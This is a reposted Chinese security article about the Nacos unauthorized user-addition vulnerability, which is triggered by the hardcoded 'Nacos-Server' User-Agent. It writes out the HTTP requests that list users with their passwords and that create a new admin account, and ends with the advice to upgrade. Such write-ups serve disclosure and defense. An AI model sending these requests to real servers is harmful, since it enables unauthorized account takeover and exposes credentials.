nacos未授权添加用户漏洞

admin 2024年5月18日10:17:26评论6 views字数 1136阅读3分47秒阅读模式

点击蓝字 关注我们

nacos未授权添加用户漏洞

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

添加星标不迷路

由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦

漏洞介绍

nacos未授权添加用户漏洞

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

影响版本: Nacos <= 2.0.0-ALPHA.1

漏洞复现

查看用户

访问路径,可以查看用户列表(包含密码)

GET /nacos/v1/auth/users?pageNo=1&pageSize=9

User-Agent: Nacos-Server

https://s3.bmp.ovh/imgs/2023/09/07/af1e728b8aa568ff.png

添加新用户

1、访问url

http://xxx/nacos/v1/auth/users

2、请求改为post,把修改User-Agent头改为“Nacos-Server”

3、构造数据包添加一个admin用户,然后发送POST请求,返回为200,表示创建用户成功

username=admin123&password=admin123

https://s3.bmp.ovh/imgs/2023/09/07/3336c8737d566d9f.png

4、用新账户密码登录则登录成功

https://s3.bmp.ovh/imgs/2023/09/07/52a7bf5f1312e4ae.png

漏洞修复

升级Nacos版本到最新版

原文始发于微信公众号(SecHub网络安全社区):nacos未授权添加用户漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月18日10:17:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nacos未授权添加用户漏洞http://cn-sec.com/archives/2045205.html

发表评论

匿名网友 填写信息